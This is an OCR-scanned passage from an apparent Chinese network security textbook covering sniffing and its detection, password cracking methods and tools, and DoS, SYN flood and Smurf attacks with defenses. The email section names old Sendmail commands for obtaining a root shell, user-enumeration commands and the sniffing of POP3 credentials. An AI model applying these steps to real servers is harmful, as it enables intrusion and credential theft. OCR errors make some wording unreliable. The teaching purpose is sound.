软件 的 IP 转发 或 者 安装 了 其 他 的 产品 来 转发 网 络 报 文 。 对 B 来 说 ， 一 切 似乎 都 非常 正 
常 。 而 实际 上 ，B 所 发 送 的 任何 用 户 资源 都 已 经 完全 被 C ART 


— < 
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图 3-35 中 间 人 攻击 


3.3.2.4 ”无 线 局 域 网 络 的 嗅 控 

无 线 局 域 网 (WLAN，WirelessLocalAreaNetworks) 因 其 安装 便捷 、 组 网 灵活 的 优 
点 在 许多 领域 获得 了 越 来 越 广泛 的 应 用 ,但 由 于 它 传送 的 数据 利用 无 线 电波 在 空中 传播 ， 
发 射 的 数据 可 能 到 达 预 期 之 外 的 接收 设备 ， 因 而 WLAN 中 无 线 信道 的 开放 性 给 网 络 嗅 
探 带 来 了 极 大 的 方便 。 在 WLAN 中 网 络 噢 探 对 信息 安全 的 威胁 来 自 其 被 动 性 和 非 干扰 
性 ， 运 行 监听 程序 的 主机 在 窃听 的 过 程 中 只 是 被 动 的 接收 网 络 中 传输 的 信息 ， 它 不 会 跟 
其 他 的 主机 交换 信息 ， 也 不 修改 在 网 络 中 传输 的 信息 包 ， 使 得 网 络 嗅 探 具有 很 强 的 隐蔽 
性 ， 往 往 让 网 络 信息 泄密 变 得 不 容易 被 发 现 。 尽 管 它 没有 对 网 络 进行 主动 攻击 和 破坏 的 
和 危害 明显 ， 但 由 它 造成 的 损失 也 是 不 可 估量 的 。 只 有 通过 分 析 网 络 嗅 探 的 原理 与 本 质 ， 
才能 更 有 效 地 防 患 于 未 然 ， 增 强 无 线 局 域 网 的 安全 防护 能 
3.3.2.5 网络 监听 的 防范 方法 

为 了 防范 网 络 监 听 ， 第 一 步 工作 就 是 要 确保 以 太 网 的 整体 安全 性 ， 因 为 sniffer 行为 
要 想 发 生 ， 一 个 最 重要 的 前 提 条 件 就 是 以 太 网 内 部 的 一 台 有 漏洞 的 主机 被 攻破 ， 只 有 利 
用 被 攻破 的 主机 ， 才 能 进行 Sniffer， 去 收集 以 太 网 内 敏感 的 数据 信息 。 其 次 ， 采 用 加 密 
技术 ， 因 为 如 果 Sniffer 抓 取 到 的 数据 都 是 以 密 文 传输 的 ， 那 对 入 侵 者 即使 抓 取 到 了 传输 
的 数据 信息 ， 也 很 难 还 原 出 明文 。 此 外 ， 对 安全 性 要 求 比较 高 的 公司 可 以 考虑 Kerberos, 
Kerberos 是 一 种 为 网 络 通信 提供 可 信 第 三 方 服务 的 面向 开放 系统 的 认证 机 制 ， 它 提供 了 
一 种 强加 密 机 制 使 client 端 和 server 即使 在 非 安全 的 网 络 连接 环境 中 也 能 确认 彼此 的 身 
份 ， 而 且 在 双方 通过 身份 认证 后 ， 后 续 的 所 有 通讯 也 是 被 加 密 的 。 在 实现 中 也 即 建立 可 
信 的 第 三 方 服 务 器 保留 与 之 通讯 的 系统 的 密 钥 数据 库 ， 仅 Kerberos 和 与 之 通信 的 系统 本 
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身 拥有 私 钥 (privatekey)， 然 后 通过 privatekey 以 及 认证 时 创建 的 sessionkey 来 实现 可 信 
的 网 络 通信 连接 。 
3.3.2.6 ”检测 网 络 监听 的 手段 

在 网 络 情况 下 要 检测 出 哪 台 主 机 正在 监听 是 非常 困难 的 , 因为 Sniffer 是 一 种 被 动 攻 
击 软件 ， 它 并 不 对 任何 主机 发 送 数 据 包 ， 而 只 是 静 静 地 运行 着 ， 等 待 要 捕获 的 数据 包 经 
过 。 但 目前 网 上 已 经 有 了 一 些 解决 这 个 问题 的 思路 和 产品 : 

O 反应 时 间 : 向 怀疑 有 网 络 监 听 行 为 的 网 络 发 送 大 量 垃 圾 数据 包 ， 根 据 各 个 主机 
回应 的 情况 进行 判断 ， 正 常 的 系统 回应 的 时 间 应 该 没有 太 明 显 的 变化 ， 而 处 于 混杂 模式 
的 系统 由 于 对 大 量 的 垃圾 信息 照 单 全 收 ， 所 以 很 有 可 能 回应 时 间 会 发 生 较 大 的 变化 。 

@ DNS 测试 : 许多 的 网 络 监听 软件 都 会 尝试 进行 地 址 反 向 解析 ， 在 怀疑 有 网 络 监 
听 发 生 时 可 以 在 DNS 系统 上 观测 有 没有 明显 增多 的 解析 请 求 。 

@ 利用 ping 进行 监测 : 对 于 怀疑 运行 监听 程序 的 机 器 ,用 正确 的 IP 地 址 和 错误 的 
物理 地 址 ping， 运 行 监听 程序 的 机 器 会 有 响应 。 这 是 因为 正常 的 机 器 不 接收 错误 的 物理 
地 址 , 处 理 监听 状态 的 机 器 能 接收 , 但 如 果 他 的 IPstack 不 再 次 反 向 检查 的 话 , 就 会 响应 。 

@ 利用 ARP 数据 包 进 行 监测 : 除了 使 用 ping 进行 监测 外 ， 目 前 比较 成 熟 的 有 利用 
ARP 方式 进行 监测 的 。 这 种 模式 是 上 述 ping 方式 的 一 种 变 体 ， 它 使 用 ARP 数据 包 符 代 
了 上 述 的 ICMP 数据 包 。 向 局 域 网 内 的 主机 发 送 非 广播 方式 的 ARP E, 如 果 局 域 网 内 的 
某 个 主机 响应 了 这 个 ARP 请 求 , 那么 就 可 以 判断 它 很 可 能 就 是 处 于 网 络 监听 模式 了 , 这 
是 目前 相对 而 言 比较 好 的 监测 模式 。 利 用 ARP 不 是 依靠 IP 地 址 , 而 是 依靠 ARP 找 出 IP 
地 址 对 应 的 mac 地 址 实现 的 。 而 ARP 协议 是 不 可 靠 和 无 连接 的 ， 通 常 即使 主机 没有 发 
出 ARP 请 求 ， 也 会 接受 发 给 它 的 ARP 回应 ， 并 将 回应 的 MAC 和 IP 对 应 关系 放 入 自己 
的 ARP 缓存 中 。 那 么 如 果 能 利用 这 个 特性 ,在 这 个 环节 中 做 些 文章 ,还 是 可 以 截获 数据 
包 的 。 


3.3.3 ”口令 破解 


口令 也 叫 密码 ， 英 文 名 字 就 是 Password。 口 令 攻击 是 网 络 攻击 的 最 简单 、 最 基本 的 
一 种 形式 ， 黑 客 攻 击 目 标 时 常常 把 破译 普通 用 户 的 口令 作为 攻击 的 开始 。 
3.3.31 字典 文件 

所 谓 字典 文件 就 是 根据 用 户 的 各 种 信息 建立 一 个 用 户 可 能 使 用 的 口令 的 列表 文件 。 
例如 ， 用 户 的 名 字 、 生 日 、 电 话 号 码 、 身 份 证 号 码 、 所 居住 街道 的 名 字 等 等 。 也 有 的 字 
典 是 纯粹 地 从 英语 字典 中 分 离 出 来 的 ， 因 为 有 的 用 户 喜 欢 用 英文 单词 作为 自己 常用 的 口 
令 。 也 就 是 说 ， 字 典 中 的 口令 是 根据 人 们 设置 自己 账号 口令 的 习惯 总 结 出 的 常用 口令 。 
对 攻击 者 来 说 , 攻击 的 口令 在 这 字典 文件 中 的 可 能 性 很 大 。 而 且 因为 字典 条 目 相对 较 少 ， 
在 破解 速度 上 也 远 快 于 穷 举 法 口令 攻击 。 这 种 字典 有 很 多 类 , 适合 在 不 同 的 情况 下 使 用 。 
此 外 ， 还 可 以 利用 已 给 定 的 字典 文件 ， 由 口令 猜 解 工具 使 用 某 种 操作 规则 把 字典 中 的 单 
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词 作 一 些 变换 如 idiot 变换 成 Idiot 等 等 ， 以 此 来 增加 字典 的 范围 。 
3.3.3.2 口令 攻击 类 型 

1. 字典 攻击 
因为 多 数 人 使 用 普通 词典 中 的 单词 作为 口令 ， 发 起 词典 攻击 通常 是 较 好 的 开端 。 词 
典 攻击 使 用 一 个 包含 大 多 数 词 典 单词 的 文件 ， 用 这 些 单词 猜测 用 户口 令 。 使 用 一 部 1 万 
个 单词 的 词典 一 般 能 猜测 出 系统 中 70% 的 口令 。 在 多 数 系统 中 ,和 尝试 所 有 的 组 合 相 比 ， 
词典 攻击 能 在 很 短 的 时 间 内 完成 。 

2. 强行 攻击 

许多 人 认为 如 果 使 用 足够 长 的 口令 ， 或 者 使 用 足够 完善 的 加 密 模 式 ， 就 能 有 一 个 攻 
不 破 的 口令 。 事 实 上 没有 攻 不 破 的 口令 ， 这 只 是 个 时 间 问 题 。 如 果 有 速度 足够 快 的 计算 
机 能 尝试 字母 、 数 字 、 特 殊 字符 所 有 的 组 合 ， 将 最 终 能 破解 所 有 的 口令 。 这 种 类 型 的 攻 
击 方式 叫 强行 攻击 。 使 用 强行 攻击 ， 先 从 字母 a 开始 ， 尝 试 aa, aby ac 等 等 ， 然 后 尝试 
aaa、aab、aac…… 。 玫 击 者 也 可 以 利用 分 布 式 攻击 。 如 果 攻 击 者 希望 在 尽量 短 的 时 间 内 
破解 口令 ， 可 以 利用 网 络 上 的 大 批 计算 机 破解 口令 。 

3. 组 合 攻击 

词典 攻击 只 能 发 现 词典 单词 口令 ， 但 是 速度 快 。 强 行 攻击 能 发 现 所 有 的 口令 ， 但 是 
破解 时 间 很 长 。 鉴 于 很 多 管理 员 要 求 用 户 使 用 字母 和 数字 ， 用 户 的 对 策 是 在 口令 后 面 添 
加 几 个 数字 。 如 把 口令 ericgolf 变 成 ericgolf55。 错 误 的 看 法 是 认为 攻击 者 不 得 不 使 用 强 
行 攻击 ， 这 会 很 费时 间 ， 而 实际 上 口令 很 弱 。 有 一 种 攻击 使 用 词典 单词 但 是 在 单词 尾 前 
串 接 几 个 字母 和 数字 。 这 就 是 组 合 攻击 。 基 本 上 ， 它 介 于 词典 攻击 和 强行 攻击 之 间 。 
3.3.3.3 口令 破解 器 
口令 破解 器 是 一 个 程序 ， 它 能 将 口令 解 译 出 来 ， 或 者 让 口令 保护 失效 。 口 令 破解 器 
一 般 并 不 是 真正 地 去 解码 ， 因 为 事实 上 很 多 加 密 算 法 是 不 可 逆 的 。 也 就 是 说 ， 光 是 从 被 
加 密 的 数据 和 加 密 算法 ， 不 可 能 从 它们 反 解 出 原来 未 加 密 的 数据 。 其 实 大 多 数 口令 破解 
器 是 通过 尝试 一 个 一 个 的 单词 ， 用 已 知 的 加 密 算法 来 加 密 这 些 单词 ， 直 到 发 现 一 个 单词 
经 过 加 密 后 的 结果 和 要 解密 的 数据 一 样 ， 就 认为 这 个 单词 就 是 要 找 的 密码 了 。 

下 面 列 举 一 些 常见 的 破解 工具 。InsideProSAMInside 可 以 有 效 破 解 windows 口令 ， 
QQ 杀手 2008 版 可 以 破解 QQ 密码 ，Cain 可 以 破解 屏保 AccessDatabase 和 
CiscoPIXFirewall 等 口令 ，MessenPass 可 以 恢复 出 MSN 和 YahooMessenger 等 的 口令 。 
3.3.3.4 “口令 破解 器 的 工作 过 程 

要 知道 口令 破解 器 是 如 何 工 作 的 ， 主 要 还 是 要 知道 加 密 算法 。 正 如 上 面 所 说 的 ， 许 
多 口令 破解 器 是 对 某 些 单 词 进行 加 密 ， 然 后 再 比较 。 候 选 口令 产生 器 的 作用 是 产生 可 能 
的 密码 。 通 常 有 好 几 种 方法 产生 候选 密码 。 一 种 是 从 一 个 字典 里 读 取 一 个 单词 。 这 种 方 
法 的 理论 根据 是 许多 用 户 由 于 取 密 码 有 些 不 是 很 明智 , 比如 将 自己 的 名 字 , 或 者 用 户 名 ， 
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或 者 一 个 好 记 住 的 单词 等 等 。 所 以 ， 攻 击 者 通常 都 将 这 些 单词 收集 到 一 个 文件 里 ， 即 字 
典 。 在 破解 密码 时 ， 从 这 些 字典 里 取出 候选 密码 。 

另 一 种 方法 是 用 枚 举 法 来 产生 这 样 的 单词 。 通 常 从 一 个 字母 开始 ， 一 直 增 加 ， 直 到 
破解 出 密码 为 止 。 这 里 , 通常 要 指定 组 成 密码 的 字符 集 ， 比 如 从 A-Z，0-9 等 等 。 为 了 便 
于 协同 破解 密码 ， 常 常 需 要 为 密码 产生 器 指定 产生 的 密码 的 范围 。 

口令 加 密 就 是 用 加 密 算法 对 从 口令 候选 器 送 来 的 单词 进行 加 密 。 通 常 ， 攻 击 不 同 的 
系统 ， 要 采用 不 同 的 加 密 算法 。 加 密 算法 有 很 多 ， 通 常 是 不 可 逆 的 。 口 令 比 较 就 是 将 从 
口令 加 密 器 得 到 的 密 文 与 要 破解 的 密 文 进行 比较 。 如 果 一 致 ， 那 么 当前 候选 口令 发 生 器 
产生 的 单词 就 是 要 找 的 密码 。 如 果 不 一 致 ， 则 口令 发 生 器 再 产生 下 一 个 候选 口令 。 
3.3.3.5 ”Email 口令 破解 

电子 邮件 的 发 送 、 传 送 和 接收 整个 过 程 中 的 每 个 环节 都 可 能 存在 薄弱 环节 ， 亚 意 用 
户 如 果 利 用 其 漏洞 ， 就 能 够 轻易 地 破解 出 账号 ， 获 得 邮件 内 容 。 常 用 方法 有 如 下 三 种 。 

© 利用 邮件 服务 器 操作 系统 的 漏洞 。 邮 件 服务 器 软件 是 运行 在 特定 的 操作 系统 上 
的 ， 如 Linux、WindowsNT/2000 等 。 这 些 操作 系统 的 默认 安装 和 配置 都 是 不 安全 的 ， 黑 
客 可 以 轻易 入 侵 系 统 ， 获 得 所 有 用 户 名 和 密码 。 

@ 利用 邮件 服务 器 软件 本 身 的 漏洞 。 最 常见 的 邮件 服务 器 程序 有 Sendmail, Qmail 
等 ， 在 不 同 程度 在 都 存在 安全 缺陷 。 以 Sendmail 为 例 ， 再 以 前 的 老 版 本 中 ，telnet 到 25 
端口 ， 输 入 wiz， 然 后 接着 输入 shell， 就 能 获得 一 个 rootshell， 还 有 debug 命令 ， 也 能 
获得 root 权限 。Qmail 相对 Sendmail 安全 ， 但 是 Qpoper 存在 缓冲 区 缺陷 ， 能 够 远程 得 
到 rootshell， 进 而 控制 系统 。 即 使 邮件 服务 器 是 安全 的 ， 但 是 入 侵 者 还 能 获得 更 多 的 信 
息 ， 比 如 用 户 名 。telnet 到 25 端口 ,输入 expntom 或 者 vrfytom 就 能 查询 系统 是 否 有 tom 
用 户 。 最 新 版 本 的 Sendmail 虽然 禁用 了 这 两 个 命令 ， 但 是 可 以 通过 伪造 发 信人 然后 用 
reptto 来 判断 该 用 户 是 否 存在 。 得 到 了 用 户 名 ， 可 以 telnet 到 110 端口 ， 尝 试 简单 密码 的 
连接 ， 或 者 套用 字典 破解 。 

© 在 邮件 的 传输 过 程 中 窃听 。 在 网 络 中 安装 Sniffer， 指 定 监听 往外 部 服务 器 110 
端口 发 送 的 数据 包 , 从 收集 下 来 的 信息 中 查看 user 和 pass 后 的 字符 串 就 能 看 到 用 户 名 和 
相应 的 密码 。 
3.3.3.6 口令 攻击 的 防护 

要 有 效 防范 口令 攻击 ， 要 选择 一 个 好 口令 ， 并 且 要 注意 保护 口令 的 安全 。 

© 好 口令 是 防范 口令 攻击 的 最 基本 、 最 有 效 的 方法 。 最 好 采用 字母 、 数 字 、 还 有 
标点 符号 、 特 殊 字符 的 组 合 ， 同 时 有 大 小 写字 母 ， 长 度 最 好 达到 8 个 以 上 ， 最 好 容易 记 
忆 ， 不 必 把 口令 写 下 来 ， 绝 对 不 要 用 自己 或 亲友 的 生日 、 手 机 号 码 等 易于 被 他 人 获知 的 
信息 作 密 码 。 

© 注意 保护 口令 安全 。 不 要 将 口令 记 在 纸 上 或 存储 于 计算 机 文件 中 ;最 好 不 要 告 
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诉 别人 你 的 口令 ， 不 要 在 不 同 的 系统 中 使 用 相同 的 口令 ; 在 输入 口令 时 应 确保 无 人 在 身 
边 完 视 ， 在 公共 上 网 场所 如 网 吧 等 处 最 好 先 确认 系统 是 否 安全 ;定期 更 改口 令 ， 至 少 六 
个 月 更 改 一 次 ， 这 会 使 遭受 口令 攻击 的 风险 降 到 最 低 。 


3.3.4 ”拒绝 服务 攻击 


拒绝 服务 攻击 的 主要 企图 是 借助 于 网 络 系统 或 网 络 协议 的 缺陷 和 配置 漏洞 进行 网 
络 攻击 ， 使 网 络 拥塞、 系统 资源 耗 尽 或 者 系统 应 用 死 锁 ， 妨 和 碍 目标 主机 和 网 络 系统 对 正 
常用 户 服务 请 求 的 及 时 响应 ， 造 成 服务 的 性 能 受 损 甚 至 导致 服务 中 断 。 本 章 介 绍 DoS Be 
击 的 定义 、 思 想 和 分 类 ， 对 SYNFlooding 攻击 、Smurf 攻击 、 利 用 处 理 程序 错误 的 拒绝 
服务 攻击 、 电 子 邮件 龙 炸 攻击 和 分 布 式 拒绝 服务 攻击 (DDoS) 方法 分 别 进行 了 详细 的 
分 析 ， 并 对 每 一 种 攻击 提供 了 防范 措施 。 
3.3.4.1 ”拒绝 服务 攻击 概述 

拒绝 服务 攻击 DoS (DenialofService) 是 阻止 或 拒绝 合法 使 用 者 存 取 网 络 服务 器 (一 
Mey Web, FTP 或 邮件 服务 器 ) 的 一 种 破坏 性 攻击 方式 。DoS 攻击 是 由 人 为 或 非 人 为 发 
起 的 行动 ， 使 主机 硬件 、 软 件 或 者 两 者 同时 失去 工作 能 力 ， 使 系统 不 可 访问 并 因此 拒绝 
合法 的 用 户 服务 要 求 。 这 种 攻击 往往 是 针对 TCP/IP 协议 中 的 某 个 弱点 , 或 者 系统 存在 的 
某 些 漏洞 ， 对 目标 系统 发 起 的 大 规模 进攻 使 服务 器 充斥 大 量 要 求 回复 的 信息 ， 消 耗 网 络 
带宽 或 系统 资源 ， 导 致 目标 网 络 或 系统 不 胜 负 荷 以 至 于 瘫痪 而 无 法 向 合法 的 用 户 提供 正 
常 的 服务 。DoS 技术 严格 地 说 只 是 一 种 破坏 网 络 服务 的 技术 方式 , 具体 的 实现 多 种 多 样 ， 
但 都 有 一 个 共同 点 ， 就 是 其 根本 目的 是 使 受害 主机 或 网 络 失去 及 时 接受 处 理 外 界 请 求 ， 
或 无 法 及 时 回应 外 界 请 求 。 

要 对 服务 器 实施 拒绝 服务 攻击 ， 实 质 上 的 方式 就 是 有 两 个 : 

© 服务 器 的 缓冲 区 满 ， 不 接收 新 的 请 求 。 

© 使 用 IP 欺骗， 迫使 服务 器 把 合法 用 户 的 连接 复位 ， 影 响 合法 用 户 的 连接 。 这 也 
是 DoS 攻击 实施 的 基本 思想 。 
3.3.4.2 ”拒绝 服务 攻击 类 型 

拒绝 服务 攻击 有 许多 种 ， 网 络 的 内 外 部 用 户 都 可 以 发 动 这 种 攻击 。 内 部 用 户 可 以 通 
过 长 时 间 占 用 系统 的 内 存 、CPU 处 理 时 间 使 其 他 用 户 不 能 及 时 得 到 这 些 资源 ， 而 引起 拒 
绝 服务 攻击 ; 外 部 黑客 也 可 以 通过 占用 网 络 连接 使 其 他 用 户 得 不 到 网 络 服务 。 本 节 主 要 
讨论 外 部 用 户 实 施 的 拒绝 服务 攻击 。 

外 部 用 户 针 对 网 络 连接 发 动 拒绝 服务 攻击 主要 有 以 下 几 种 模式 : 

1. 消耗 资源 

计算 机 和 网 络 需要 一 定 的 条 件 才 能 运行 ,如 网 络 带 宽 、 内 存 、 磁 盘 空 间 、CPU 时 间 。 
攻击 者 利用 系统 资源 有 限 这 一 特征 ， 或 者 是 大 量 地 申请 系统 资源 ， 并 长 时 间 地 占用 ; 或 
者 是 不 断 地 向 服务 程序 发 请 求 ， 使 系统 忙于 处 理 自己 的 请 求 ， 而 无 暇 为 其 他 用 户 提 供 服 
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务 。 攻 击 者 可 以 针对 以 下 几 种 资源 发 起 拒绝 服务 攻击 。 

O 针对 网 络 连接 的 拒绝 服务 攻击 。 

@ 消耗 磁盘 空间 。 

@ 消耗 CPU 资源 和 内 存 资源 。 

2. 破坏 或 更 改 配置 信息 

计算 机 系统 配置 上 的 错误 也 可 能 造成 拒绝 服务 攻击 ， 尤 其 是 服务 程序 的 配置 文件 以 
及 系统 、 用 户 的 启动 文件 。 这 些 文件 一 般 只 有 该 文件 的 属 主 才 可 以 写 入 ， 如 果 权 限 设置 
有 误 ， 攻 击 者 〈 包 括 已 获得 一 般 访 问 权 的 黑客 与 恶意 的 内 部 用 户 ) 可 以 修改 配置 文件 ， 
从 而 改变 系统 向 外 提供 服务 的 方式 。 

3. 物理 破坏 或 改变 网 络 部 件 

这 种 拒绝 服务 针对 的 是 物理 安全 ， 一 般 来 说 ， 通 过 物理 破坏 或 改变 网 络 部 件 以 达到 
拒绝 服务 的 目的 。 其 攻击 的 目标 有 : 计算 机 、 路 由 器 、 网 络 配 线 室 、 网 络 主干 段 、 电 源 、 
冷却 设备 、 其 他 的 网 络 关键 设备 。 

4. 利用 服务 程序 中 的 处 理 错误 使 服务 失效 

最 近 出 现 了 一 些 专门 针对 Windows 系统 的 攻击 方法 ， 如 LAND 等 等 。 被 这 些 工具 
攻击 之 后 ， 目 标 机 的 网 络 连 接 就 会 莫名 其 妙 地 断 掉 ， 不 能 访问 任何 网 络 资源 ， 或 者 出 现 
莫名 其 妙 的 蓝屏 ， 系 统 进入 死 锁 状 况 。 这 些 攻击 方法 主要 利用 服务 程序 中 的 处 理 错误 ， 
发 送 一 些 该 程序 不 能 正确 处 理 的 数据 包 ， 引 起 该 服务 进入 死 循环 。 
3.3.4.3 ”服务 端口 攻击 

网 络 服务 器 通常 开放 了 一 些 服务 端口 ， 服 务 端口 攻击 就 是 向 这 些 端口 发 送 大 量 的 数 
据 包 ， 从 而 耗 尽 目标 主机 的 资源 ， 使 该 服务 器 不 能 接受 合法 用 户 的 正常 访问 。 上 节 介 绍 
的 消耗 资源 、 破 坏 或 改变 配置 信息 和 利用 服务 程序 中 的 处 理 错误 使 服务 失效 等 攻击 都 可 
以 利用 此 种 攻击 。 下 面 将 详细 介绍 一 些 典 型 的 服务 端口 攻击 方式 。 

1. 同步 包 风 暴 (SYNFlooding) 

1996 年 9 月 以 来 ， 许 多 Internet 站 点 遭受 了 一 种 称 为 SYN 洪 泛 (SYNflooding) 的 
DoS 攻击 。 它 是 通过 创建 大 量 “ 半 连接 ”来 进行 攻击 ， 任 何 连接 收 到 Intemet 上 并 提供 
基于 TCP 的 网 络 服务 的 主机 或 路 由 器 都 可 能 成 为 这 种 攻击 的 目标 , 并 且 跟 踪 攻 击 的 来 源 
十 分 困难 。 
同步 包 风 暴 是 当前 最 流行 的 DoS (拒绝 服务 攻击 ) 与 DDoS (分 布 式 拒绝 服务 攻击 ) 
的 方式 之 一 ， 是 应 用 最 广泛 的 一 种 DoS 攻击 方式 ， 它 的 原理 虽然 简单 ， 但 使 用 起 来 却 十 
分 有 效 。 

问题 出 在 TCP 连接 的 三 次 握手 中 (参见 3.1.2 节 TCP 协议 )， 假 设 一 个 用 户 向 服务 
器 发 送 了 SYN 报 文 后 突然 死机 或 掉 线 ， 那 么 服务 器 在 发 出 SYN 十 ACK 应 答 报 文 后 是 无 
法 收 到 客户 端的 ACK 报 文 的 《第 三 次 握手 无 法 完成 )， 这 种 情况 下 服务 器 端 一 般 会 重 试 
(再 次 发 送 SYN+ ACK 给 客户 端 ) 并 等 待 一 段 时 间 后 丢弃 这 个 未 完成 的 连接 ， 这 段 时 间 
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的 长 度 称 为 SYNTimeout， 一 般 来 说 这 个 时 间 是 分 钟 的 数量 级 〈 大 约 为 30 秒 一 2 分 钟 ); 

个 用 户 出 现 异 常 导致 服务 器 的 一 个 线程 等 待 1 分 钟 并 不 是 什么 很 大 的 问题 ， 但 如 果 有 
一 个 恶意 的 攻击 者 大 量 模拟 这 种 情况 ， 服 务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列表 而 
消耗 非常 多 的 资源 一 一 数 以 万 计 的 半 连 接 ， 即 使 是 简单 的 保存 并 遍历 也 会 消耗 非常 多 的 
CPU 时 间 和 内 存 ， 何 况 还 要 不 断 对 这 个 列表 中 的 他 进行 SYN 十 ACK 的 重 试 。 实际 上 如 
果 服 务 器 的 TCP / IP 堆栈 不 够 强大 ， 最 后 的 结果 往往 是 堆栈 溢出 崩溃 。 即 使 服务 器 端的 
系统 足够 强大 , 服务 器 端 也 将 忙于 处 理 攻击 者 伪造 的 TCP 连接 请 求 而 无 暇 理 皮 客户 的 正 
常 请 求 ( 毕 竞 客户 端的 正常 请 求 比率 非常 之 小 )， 此 时 从 正常 客户 的 角度 看 来 ， 服务 器 失 
去 响应 ， 这 种 情况 称 作 : 服务 器 端 受 到 了 SYNflooding 攻击 。 


伪造 源 地 址 的 SYN 包 


SYN 十 ACK 


图 3-36 目的 主机 D 遭受 SYN 洪水 攻击 


如 图 3-36 所 示 ， 如 果 攻 击 者 盗用 的 是 某 台 可 达 主 机 XX 的 人 地址， 由 于 主机 义 没有 
向 主机 D 发 送 连 按 请 求 ， 所 以 当 它 收 到 来 自 D 的 SYN+ACK 包 时 ， 会 向 D 发 迭 RST 
包 ， 主 机 D 会 将 该 连 按 重 置 。 因 此 ， 攻 击 者 通常 伪造 主机 D 不 可 达 的 IP 地 址 作为 源 地 
址 。 攻 击 者 只 要 发 送 较 少 的， 来 源 地 址 经 过 伪装 而 且 无 法 通过 路 由 达到 的 SYN 连接 请 
求 至 目标 主机 提供 TCP 服务 的 端口 ， 将 目的 主机 的 TCP 缓存 队列 填 满 ， 就 可 以 实施 一 
次 成 功 的 攻击 。 实 际 情况 下 ， 攻 击 者 往往 会 持续 不 断 地 发 送 SYN 包 ， 故 称 为 “SYN 
洪水 ”。 

同步 包 风 暴 拒绝 服务 攻击 具有 以 下 特点 : 

@ 针对 TCP/IP 协议 的 薄弱 环节 进行 攻击 ; 

© 发 动 攻击 时 ， 只 要 很 少 的 数据 流量 就 可 以 产生 显著 的 效果 ; 

@ 攻击 来 源 无 法 定位 ; 

@ 在 服务 端 无 法 区 分 TCP 连接 请 求 是 否 合法 

同步 包 风暴 攻击 的 本 质 是 利用 TCP/IP 协议 集 的 设计 弱点 和 缺陷。 只 有 对 现 有 的 
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TCP/IP 协议 集 进 行 重 大 改变 才能 修正 这 些 缺 陷 。 目 前 还 没有 一 个 完整 的 解决 方案 ， 但 是 
可 以 采取 一 些 措施 尽量 降低 这 种 攻击 发 生 的 可 能 性 。 
基于 上 述 同 步 包 风暴 攻击 的 特点 ， 可 以 在 多 个 层面 进行 应 对 ; 
© 优化 系统 配置 。 包 括 缩短 超时 时 间 ， 增 加 半 连 接 队 列 长 度 ， 关 闭 不 重要 的 服务 等 。 
@ 优化 路 由 器 配置 。 配 置 路 由 器 的 外 网 卡 ， 丢 弃 那 些 来 自 外 部 网 而 源 IP 地 址 具有 
bP 网 络 地址 的 包 ; 配置 路 由 器 的 内 网 卡 ， 丢弃 那些 即将 发 到 外 部 网 而 源 IP 地 址 不 具有 
bP 网 络 地 址 的 包 。 这 种 方法 可 以 有 效 地 减少 攻击 的 可 能 。 
图 完善 基础 设施 。 现 有 的 网 络 体系 结构 没有 对 源 他 地 址 进行 检查 的 机 制 ， 也 不 具 
备 追 踪 网 络 数据 包 物 理 传输 路 径 的 机 制 ， 使 得 发 现 攻击 者 十 分 困难 。 而 且 许多 攻击 手段 
都 是 利用 现 有 网 络 协议 的 缺陷 。 因 此 ， 对 整个 网 络 体系 结构 的 改造 十 分 重要 。 

@ 使 用 防火 墙 。 采 用 半 透 明 网 关 技术 的 防火 墙 能 有 效 防范 同步 包 风 暴 攻 击 。 

© 主动 监视 。 监 视 TCP/IP 流量 ， 收 集 通信 控制 信息 ， 分 析 状 态 ， 辨 别 攻击 行为 。 

2. Smurf 攻击 

Smurf 拒绝 服务 攻击 是 以 最 初 发 动 这 种 攻击 的 程序 名 Smurf 来 命名 的 。 这 种 攻击 方 
法 结合 使 用 了 IP 欺骗 和 ICMP 回复 方法 使 大 量 网 络 数据 充斥 目标 系统 , 引起 目标 系统 拒 
绝 为 正常 请 求 进行 服务 。 

Smurf 攻击 的 原理 如 图 3-37 所 示 ， 攻 击 者 主要 使 用 卫 广播 和 IP 欺骗 的 方法 ， 发 送 
伪造 的 ICMPECHOREQUEST 包 给 目标 网 络 的 正 广播 地 址 。 

ICMP 是 用 来 处 理 错 误 和 交换 控制 信息 的 ， 并 且 可 以 用 来 确定 网 络 上 的 某 台 主机 是 
否 响应 。 在 一 个 网 络 上 ， 可 以 向 某 个 单一 主机 ， 也 可 以 向 局 域 网 的 广播 地 址 发 送 他 包 。 
当 攻 击 者 向 某 个 网 络 的 广播 地 址 发 送 ICMPECHOREQUEST 包 时 ,如 果 网 络 的 路 由 器 对 
发 往 网 络 广播 地 址 的 ICMP 包 不 进行 过 滤 , 则 网 络 内 部 的 所 有 主机 都 可 以 接收 到 该 ICMP 
包 ， 并 且 都 要 向 ICMP 包 所 指示 的 源 地 址 发 送 ICMPECHOREPLY 响应 包 。 如 果 攻 击 者 
将 发 送 的 ICMP 包 的 源 地 址 伪造 成 被 攻击 者 的 地 址 ， 则 该 网 络 上 所 有 主机 的 
ICMPECHOREPLY 包 都 要 发 往 被 攻击 的 主机 。 这 种 攻击 不 仅 造成 被 攻击 主机 流量 过 载 、 
减 慢 甚至 停止 正常 的 服务 ， 而 且 发 出 ICMP 响应 包 的 中 间 受 害 网 络 也 会 出 现 拥 塞 甚至 网 
络 瘫痪 。 可 以 说 ，Smurf 攻击 的 受害 者 是 攻击 者 的 攻击 目标 和 无 辜 充 当 攻击 者 攻击 工具 
的 第 三 方 网 络 。 

一 个 简单 的 Smurf 攻击 将 回复 地 址 设置 成 受害 网 络 的 广播 地 址 ， 通 过 使 用 ICMP 应 
答 请 求 (Ping) 数据 包 来 淹没 受害 主机 的 方式 进行 ， 最 终 导致 该 网 络 的 所 有 主机 都 对 此 
ICMP 应 答 请 求 作出 答复 ， 导 致 网 络 阻塞 ， 这 种 攻击 方式 即 PING 风暴 (PINGFlooding) 
拒绝 服务 攻击 。 更 加 复杂 的 Smurf 攻击 将 源 地 址 改 为 第 三 方 的 受害 者 ， 最 终 导致 第 三 方 
HAW 

广播 信息 可 以 通过 一 定 的 手段 (通过 广播 地 址 或 其 他 机 制 ) 发 送 到 整个 网 络 中 的 机 
器 。 当 某 台 机 器 使 用 广播 地 址 发 送 一 个 ICMPecho 请 求 包 时 (例如 Ping), 一 些 系 统 会 回 
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应 一 个 ICMPecho 回应 包 ， 即 发 送 一 个 包 会 收 到 许多 的 响应 包 。Smurf 攻击 就 是 使 用 这 
